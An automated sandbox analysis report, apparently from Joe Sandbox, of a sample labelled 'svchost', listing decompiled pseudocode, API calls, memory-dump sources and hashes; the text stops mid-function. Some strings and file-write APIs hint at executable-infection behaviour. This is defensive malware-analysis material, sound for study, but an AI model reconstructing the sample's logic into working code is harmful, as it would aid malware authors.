                                                                          
                                                                          				_t128 = __eflags;
                                                                          				_push(__eax);
                                                                          				E00406144(__eax);
                                                                          				_pop(_t59);
                                                                          				if(_t128 != 0) {
                                                                          					asm("pushad");
                                                                          					_t100 = _t59;
                                                                          					 *((intOrPtr*)(_t100 + 0x34))();
                                                                          					 *((intOrPtr*)(_t100 + 0x28)) = 0;
                                                                          					 *((intOrPtr*)(_t100 + 0x56)) = 0;
                                                                          					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
                                                                          					asm("jecxz 0x13");
                                                                          					_t62 =  *(_t100 + 0x3d);
                                                                          					_t121 =  *(_t62 + 4);
                                                                          					_t119 =  *(_t62 + 8);
                                                                          					if(_t119 < 0) {
                                                                          						_t119 =  ~_t119;
                                                                          					}
                                                                          					_push(0);
                                                                          					L00404108();
                                                                          					_push(_t62);
                                                                          					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
                                                                          					if( *((char*)(_t100 + 0x3c)) != 1) {
                                                                          						asm("jecxz 0xfffffff2");
                                                                          						_t124 = 0;
                                                                          						_t110 =  *(_t100 + 0x18);
                                                                          						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
                                                                          						__eflags =  *(_t100 + 0x49) - 5;
                                                                          						if( *(_t100 + 0x49) == 5) {
                                                                          							E0040600C(_t67, _t110);
                                                                          						}
                                                                          						_pop(_t68);
                                                                          						_push(_t68);
                                                                          						_push(E00406268(_t68) *  *(_t100 + 0x18));
                                                                          						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
                                                                          						_push(_t71);
                                                                          						_push(0);
                                                                          						_push(_v12);
                                                                          						_push(_t71);
                                                                          						_t72 =  *(_t100 + 0x18);
                                                                          						__eflags = _t72 - _t119;
                                                                          						if(__eflags > 0) {
                                                                          							_t72 = _t119;
                                                                          						}
                                                                          						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
                                                                          						_t113 =  *(_t100 + 0x18);
                                                                          						__eflags = _t113 - _t119;
                                                                          						if(_t113 > _t119) {
                                                                          							_t113 = _t119;
                                                                          						}
                                                                          						__eflags = _t75 - _t113;
                                                                          						if(__eflags != 0) {
                                                                          							_pop(_t81);
                                                                          							E00402468(_t81);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(_t126);
                                                                          							_push(0);
                                                                          							_push(_v40);
                                                                          							_push(_v36);
                                                                          							L00404110();
                                                                          							_t121 = _t121 ^ 0xffffffff;
                                                                          							_t124 = 0;
                                                                          							_t85 = SelectObject(_v60, 0);
                                                                          							_t113 = _v68;
                                                                          							__eflags = 0;
                                                                          							E00406094(_t100, 0, _v68, 0, 0);
                                                                          							SelectObject(_v72, _t85);
                                                                          						}
                                                                          						E00406024(_t100, _t100, _t113, __eflags);
                                                                          						_pop( *_t47);
                                                                          						_pop( *_t48);
                                                                          						_pop( *_t49);
                                                                          						 *(_t100 + 0x20) = _t124;
                                                                          						__eflags = _t121;
                                                                          						 *(_t100 + 0x72) = 0;
                                                                          						if(_t121 < 0) {
                                                                          							_t52 = _t100 + 0x72;
                                                                          							 *_t52 =  *(_t100 + 0x72) + 1;
                                                                          							__eflags =  *_t52;
                                                                          						}
                                                                          					} else {
                                                                          						_push(0);
                                                                          						L00404178();
                                                                          						_push(_t62);
                                                                          						_push( *(_t100 + 0x18));
                                                                          						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                                          						_push(_t62);
                                                                          						L00404100();
                                                                          						_t125 = _t62;
                                                                          						L00404190();
                                                                          						_t116 = 0;
                                                                          						_push(_t116);
                                                                          						_push(SelectObject(_t116, _t125));
                                                                          						_push( *(_t100 + 0x18));
                                                                          						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                                          						_push(0);
                                                                          						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
                                                                          						_t117 = _t126;
                                                                          						FillRect(_v44, _t126, _t94);
                                                                          						DeleteObject(_t94);
                                                                          						asm("jecxz 0x24");
                                                                          						SelectObject(_v60, 0);
                                                                          						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
                                                                          						E00406024(_t100, _t100, _t117, _t130);
                                                                          						 *(_t100 + 0x20) = _t125;
                                                                          					}
                                                                          					asm("jecxz 0xa");
                                                                          					_pop(_t114);
                                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
                                                                          					_t80 = DeleteDC(_t119);
                                                                          					asm("popad");
                                                                          					return _t80;
                                                                          				}
                                                                          				return _t59;
                                                                          			}

                                                                          • Instruction addresses: 0x0040627c 0x0040627c 0x0040627d 0x00406282 0x00406283 0x00406289 0x0040628a 0x0040628c 0x00406291 0x00406294 0x00406297 0x004062a3 0x004062a5 0x004062a8 0x004062ab 0x004062b0 0x004062b2 0x004062b2 0x004062d5 0x004062d7 0x004062dc 0x004062dd 0x004062e1 0x00406397 0x00406399 0x0040639e 0x004063a6 0x004063a7 0x004063ab 0x004063ad 0x004063ad 0x004063b2 0x004063b3 0x004063be 0x004063bf 0x004063c4 0x004063c5 0x004063c7 0x004063cb 0x004063cc 0x004063cf 0x004063d1 0x004063d3 0x004063d3 0x004063e4 0x004063e9 0x004063ec 0x004063ee 0x004063f0 0x004063f0 0x004063f2 0x004063f4 0x004063f6 0x004063f7 0x004063fe 0x00406405 0x00406406 0x00406407 0x00406408 0x0040640a 0x0040640b 0x0040640f 0x00406414 0x00406417
                                                                          0x0040641d
                                                                          0x00406423
                                                                          0x00406427
                                                                          0x0040642c
                                                                          0x00406435
                                                                          0x00406435
                                                                          0x0040643c
                                                                          0x00406441
                                                                          0x00406444
                                                                          0x00406447
                                                                          0x0040644a
                                                                          0x0040644d
                                                                          0x0040644f
                                                                          0x00406453
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x004062e7
                                                                          0x004062e7
                                                                          0x004062e9
                                                                          0x004062ee
                                                                          0x004062ef
                                                                          0x004062f2
                                                                          0x004062f5
                                                                          0x004062f6
                                                                          0x004062fb
                                                                          0x004062fe
                                                                          0x00406303
                                                                          0x00406304
                                                                          0x0040630c
                                                                          0x0040630d
                                                                          0x00406310
                                                                          0x00406313
                                                                          0x00406320
                                                                          0x00406325
                                                                          0x0040632e
                                                                          0x00406333
                                                                          0x0040633e
                                                                          0x00406344
                                                                          0x0040635b
                                                                          0x00406378
                                                                          0x0040637d
                                                                          0x0040637d
                                                                          0x0040645b
                                                                          0x0040645d
                                                                          0x00406463
                                                                          0x00406465
                                                                          0x0040646a
                                                                          0x00000000
                                                                          0x0040646a
                                                                          0x0040646b

APIs
• GetObjectA.GDI32(?,00000018), ref: 004062C2
• 72E7A590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
• 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
• 72E7A520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
• 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
• SelectObject.GDI32(00000000), ref: 00406307
• CreateSolidBrush.GDI32(00000000), ref: 00406320
• FillRect.USER32 ref: 0040632E
• DeleteObject.GDI32(?), ref: 00406333
• SelectObject.GDI32(?), ref: 00406344
• SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
• SelectObject.GDI32(00000000,?), ref: 00406371
• GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
• 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
• SelectObject.GDI32(?,00000000), ref: 0040641D
• SelectObject.GDI32(?,00000000), ref: 00406435
• DeleteDC.GDI32 ref: 00406465
Memory Dump Source
• Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
• String ID:
• API String ID: 2504469172-0
• Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
• Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
• Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
• Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetObjectA.GDI32(?,00000018), ref: 0040FD5A
• 72E7A590.GDI32(00000000), ref: 0040FD6F
• 72E7AC50.USER32(00000000,00000000,00000000), ref: 0040FD81
• 72E7A520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
• 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
• SelectObject.GDI32(00000000), ref: 0040FD9F
• CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
• FillRect.USER32 ref: 0040FDC6
• DeleteObject.GDI32(?), ref: 0040FDCB
• SelectObject.GDI32(?), ref: 0040FDDC
• SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
• SelectObject.GDI32(?), ref: 0040FE09
• GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
• 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
• SelectObject.GDI32(?,00000000), ref: 0040FEB5
• SelectObject.GDI32(?,00000000), ref: 0040FECD
• DeleteDC.GDI32(00000000), ref: 0040FEFD
Memory Dump Source
• Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
Yara matches
Similarity
• API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
• String ID:
• API String ID: 2504469172-0
• Opcode ID: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
• Instruction ID: 8bfa987d25260d88ee3329e71298cc77801f48d1f8f03ee880f1b7424a85638e
• Opcode Fuzzy Hash: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
• Instruction Fuzzy Hash: A051D4716042006FDB14AF65CC82F2B3B69EF84314F1148BEB905BB6D7D639EC088B98
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 57%
                                                                          			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
                                                                          				struct HDC__* _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				struct HDC__* _v44;
                                                                          				struct HDC__* _v60;
                                                                          				struct HDC__* _v68;
                                                                          				struct HDC__* _v72;
                                                                          				void* __ebx;
                                                                          				void* _t64;
                                                                          				void* _t66;
                                                                          				struct HBITMAP__* _t69;
                                                                          				void* _t75;
                                                                          				void* _t78;
                                                                          				int _t79;
                                                                          				int _t82;
                                                                          				int _t87;
                                                                          				void* _t88;
                                                                          				void* _t92;
                                                                          				void* _t101;
                                                                          				void* _t108;
                                                                          				void* _t111;
                                                                          				void* _t113;
                                                                          				void* _t115;
                                                                          				void* _t133;
                                                                          				struct HDC__* _t135;
                                                                          				struct HDC__* _t137;
                                                                          				void* _t139;
                                                                          				int* _t140;
                                                                          				struct HDC__* _t142;
                                                                          				signed int _t144;
                                                                          				struct HBITMAP__* _t147;
                                                                          				struct HBITMAP__* _t148;
                                                                          				RECT* _t149;
                                                                          				void* _t151;
                                                                          
                                                                          				_t151 = __eflags;
                                                                          				_t113 = __eax;
                                                                          				_t64 = E00406144(__eax);
                                                                          				if(_t151 == 0) {
                                                                          					L7:
                                                                          					if(__eflags != 0) {
                                                                          						E00406144(_t64);
                                                                          						_t66 = _t64;
                                                                          						if(__eflags != 0) {
                                                                          							asm("pushad");
                                                                          							_t115 = _t66;
                                                                          							 *((intOrPtr*)(_t115 + 0x34))();
                                                                          							 *((intOrPtr*)(_t115 + 0x28)) = 0;
                                                                          							 *((intOrPtr*)(_t115 + 0x56)) = 0;
                                                                          							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
                                                                          							asm("jecxz 0x13");
                                                                          							_t69 =  *(_t115 + 0x3d);
                                                                          							_t144 =  *(_t69 + 4);
                                                                          							_t142 =  *(_t69 + 8);
                                                                          							__eflags = _t142;
                                                                          							if(_t142 < 0) {
                                                                          								_t142 =  ~_t142;
                                                                          							}
                                                                          							_push(0);
                                                                          							L00404108();
                                                                          							_push(_t69);
                                                                          							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
                                                                          							if( *((char*)(_t115 + 0x3c)) != 1) {
                                                                          								asm("jecxz 0xfffffff2");
                                                                          								_t147 = 0;
                                                                          								_t129 =  *(_t115 + 0x18);
                                                                          								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
                                                                          								__eflags =  *(_t115 + 0x49) - 5;
                                                                          								if( *(_t115 + 0x49) == 5) {
                                                                          									E0040600C(_t74, _t129);
                                                                          								}
                                                                          								_pop(_t75);
                                                                          								_push(_t75);
                                                                          								_push(E00406268(_t75) *  *(_t115 + 0x18));
                                                                          								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
                                                                          								_push(_t78);
                                                                          								_push(0);
                                                                          								_push(_v12);
                                                                          								_push(_t78);
                                                                          								_t79 =  *(_t115 + 0x18);
                                                                          								__eflags = _t79 - _t142;
                                                                          								if(__eflags > 0) {
                                                                          									_t79 = _t142;
                                                                          								}
                                                                          								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
                                                                          								_t132 =  *(_t115 + 0x18);
                                                                          								__eflags = _t132 - _t142;
                                                                          								if(_t132 > _t142) {
                                                                          									_t132 = _t142;
                                                                          								}
                                                                          								__eflags = _t82 - _t132;
                                                                          								if(__eflags != 0) {
                                                                          									_pop(_t88);
                                                                          									E00402468(_t88);
                                                                          									_push(0);
                                                                          									_push(0);
                                                                          									_push(0);
                                                                          									_push(_t149);
                                                                          									_push(0);
                                                                          									_push(_v40);
                                                                          									_push(_v36);
                                                                          									L00404110();
                                                                          									_t144 = _t144 ^ 0xffffffff;
                                                                          									_t147 = 0;
                                                                          									_t92 = SelectObject(_v60, 0);
                                                                          									_t132 = _v68;
                                                                          									__eflags = 0;
                                                                          									E00406094(_t115, 0, _v68, 0, 0);
                                                                          									SelectObject(_v72, _t92);
                                                                          								}
                                                                          								E00406024(_t115, _t115, _t132, __eflags);
                                                                          								_pop( *_t51);
                                                                          								_pop( *_t52);
                                                                          								_pop( *_t53);
                                                                          								 *(_t115 + 0x20) = _t147;
                                                                          								__eflags = _t144;
                                                                          								 *(_t115 + 0x72) = 0;
                                                                          								if(_t144 < 0) {
                                                                          									_t56 = _t115 + 0x72;
                                                                          									 *_t56 =  &( *(_t115 + 0x72)->i);
                                                                          									__eflags =  *_t56;
                                                                          								}
                                                                          								goto L25;
                                                                          							} else {
                                                                          								_push(0);
                                                                          								L00404178();
                                                                          								_push(_t69);
                                                                          								_push( *(_t115 + 0x18));
                                                                          								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                                          								_push(_t69);
                                                                          								L00404100();
                                                                          								_t148 = _t69;
                                                                          								L00404190();
                                                                          								_t135 = 0;
                                                                          								_push(_t135);
                                                                          								_push(SelectObject(_t135, _t148));
                                                                          								_push( *(_t115 + 0x18));
                                                                          								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                                          								_push(0);
                                                                          								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
                                                                          								_t136 = _t149;
                                                                          								FillRect(_v44, _t149, _t101);
                                                                          								DeleteObject(_t101);
                                                                          								asm("jecxz 0x24");
                                                                          								SelectObject(_v60, 0);
                                                                          								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
                                                                          								E00406024(_t115, _t115, _t136, __eflags);
                                                                          								 *(_t115 + 0x20) = _t148;
                                                                          								L25:
                                                                          								asm("jecxz 0xa");
                                                                          								_pop(_t133);
                                                                          								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
                                                                          								_t87 = DeleteDC(_t142);
                                                                          								asm("popad");
                                                                          								return _t87;
                                                                          							}
                                                                          						}
                                                                          						return _t66;
                                                                          					} else {
                                                                          						return _t64;
                                                                          					}
                                                                          				} else {
                                                                          					_push(__edx);
                                                                          					_t64 = E0040648C(_t113, __edx);
                                                                          					_pop(_t137);
                                                                          					if(_t64 == _t137) {
                                                                          						goto L7;
                                                                          					} else {
                                                                          						_t108 = _t113;
                                                                          						if(_t137 != 0) {
                                                                          							 *(_t113 + 0x49) = _t137;
                                                                          							__eflags = _t137 - 5;
                                                                          							if(_t137 == 5) {
                                                                          								_t137 = _t137 - 1;
                                                                          								__eflags = _t137;
                                                                          							}
                                                                          							L27();
                                                                          							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
                                                                          							_t139 = _t137;
                                                                          							__eflags = _t111 - _t139;
                                                                          							_t64 = _t113;
                                                                          							goto L7;
                                                                          						} else {
                                                                          							_t140 =  &(_t137->i);
                                                                          							if(_t140 !=  *(_t108 + 0x3c)) {
                                                                          								 *(_t108 + 0x3c) = _t140;
                                                                          								L9();
                                                                          								return _t108;
                                                                          							}
                                                                          							return _t108;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          0x00406218
                                                                          0x00406219
                                                                          0x0040621b
                                                                          0x00406220
                                                                          0x0040625d
                                                                          0x0040625e
                                                                          0x0040627d
                                                                          0x00406282
                                                                          0x00406283
                                                                          0x00406289
                                                                          0x0040628a
                                                                          0x0040628c
                                                                          0x00406291
                                                                          0x00406294
                                                                          0x00406297
                                                                          0x004062a3
                                                                          0x004062a5
                                                                          0x004062a8
                                                                          0x004062ab
                                                                          0x004062ae
                                                                          0x004062b0
                                                                          0x004062b2
                                                                          0x004062b2
                                                                          0x004062d5
                                                                          0x004062d7
                                                                          0x004062dc
                                                                          0x004062dd
                                                                          0x004062e1
                                                                          0x00406397
                                                                          0x00406399
                                                                          0x0040639e
                                                                          0x004063a6
                                                                          0x004063a7
                                                                          0x004063ab
                                                                          0x004063ad
                                                                          0x004063ad
                                                                          0x004063b2
                                                                          0x004063b3
                                                                          0x004063be
                                                                          0x004063bf
                                                                          0x004063c4
                                                                          0x004063c5
                                                                          0x004063c7
                                                                          0x004063cb
                                                                          0x004063cc
                                                                          0x004063cf
                                                                          0x004063d1
                                                                          0x004063d3
                                                                          0x004063d3
                                                                          0x004063e4
                                                                          0x004063e9
                                                                          0x004063ec
                                                                          0x004063ee
                                                                          0x004063f0
                                                                          0x004063f0
                                                                          0x004063f2
                                                                          0x004063f4
                                                                          0x004063f6
                                                                          0x004063f7
                                                                          0x004063fe
                                                                          0x00406405
                                                                          0x00406406
                                                                          0x00406407
                                                                          0x00406408
                                                                          0x0040640a
                                                                          0x0040640b
                                                                          0x0040640f
                                                                          0x00406414
                                                                          0x00406417
                                                                          0x0040641d
                                                                          0x00406423
                                                                          0x00406427
                                                                          0x0040642c
                                                                          0x00406435
                                                                          0x00406435
                                                                          0x0040643c
                                                                          0x00406441
                                                                          0x00406444
                                                                          0x00406447
                                                                          0x0040644a
                                                                          0x0040644d
                                                                          0x0040644f
                                                                          0x00406453
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00406455
                                                                          0x00000000
                                                                          0x004062e7
                                                                          0x004062e7
                                                                          0x004062e9
                                                                          0x004062ee
                                                                          0x004062ef
                                                                          0x004062f2
                                                                          0x004062f5
                                                                          0x004062f6
                                                                          0x004062fb
                                                                          0x004062fe
                                                                          0x00406303
                                                                          0x00406304
                                                                          0x0040630c
                                                                          0x0040630d
                                                                          0x00406310
                                                                          0x00406313
                                                                          0x00406320
                                                                          0x00406325
                                                                          0x0040632e
                                                                          0x00406333
                                                                          0x0040633e
                                                                          0x00406344
                                                                          0x0040635b
                                                                          0x00406378
                                                                          0x0040637d
                                                                          0x00406458
                                                                          0x0040645b
                                                                          0x0040645d
                                                                          0x00406463
                                                                          0x00406465
                                                                          0x0040646a
                                                                          0x00000000
                                                                          0x0040646a
                                                                          0x004062e1
                                                                          0x0040646b
                                                                          0x00406264
                                                                          0x00406264
                                                                          0x00406264
                                                                          0x00406222
                                                                          0x00406224
                                                                          0x00406225
                                                                          0x0040622a
                                                                          0x0040622d
                                                                          0x00000000
                                                                          0x0040622f
                                                                          0x00406231
                                                                          0x00406233
                                                                          0x0040623c
                                                                          0x0040623f
                                                                          0x00406242
                                                                          0x00406244
                                                                          0x00406244
                                                                          0x00406244
                                                                          0x00406248
                                                                          0x00406254
                                                                          0x00406259
                                                                          0x0040625a
                                                                          0x0040625c
                                                                          0x00000000
                                                                          0x00406235
                                                                          0x00406236
                                                                          0x0040647f
                                                                          0x00406481
                                                                          0x00406484
                                                                          0x00000000
                                                                          0x00406484
                                                                          0x00406489
                                                                          0x00406489
                                                                          0x00406233
                                                                          0x0040622d

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                          • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                                          • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                          • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                          • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                                          • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                          • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041040F
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00410496
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004101EA
                                                                            • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                                            • Part of subcall function 0040FBEC: 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                                            • Part of subcall function 0040FBEC: 72E7A7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                                            • Part of subcall function 0040FBEC: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 0041052B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$CopyImage$B380
                                                                          • String ID: (
                                                                          • API String ID: 1117845954-3887548279
                                                                          • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                          • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                                          • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                          • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                                            • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                                            • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                                            • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                                            • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                          • API String ID: 997383822-4093836345
                                                                          • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                          • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                                          • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                          • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 71%
                                                                          			E0040184C() {
                                                                          				void* _t2;
                                                                          				void* _t3;
                                                                          				void* _t14;
                                                                          				intOrPtr* _t19;
                                                                          				intOrPtr _t23;
                                                                          				intOrPtr _t26;
                                                                          				intOrPtr _t28;
                                                                          
                                                                          				_t26 = _t28;
                                                                          				if( *0x40a5ac == 0) {
                                                                          					return _t2;
                                                                          				} else {
                                                                          					_push(_t26);
                                                                          					_push(E00401922);
                                                                          					_push( *[fs:edx]);
                                                                          					 *[fs:edx] = _t28;
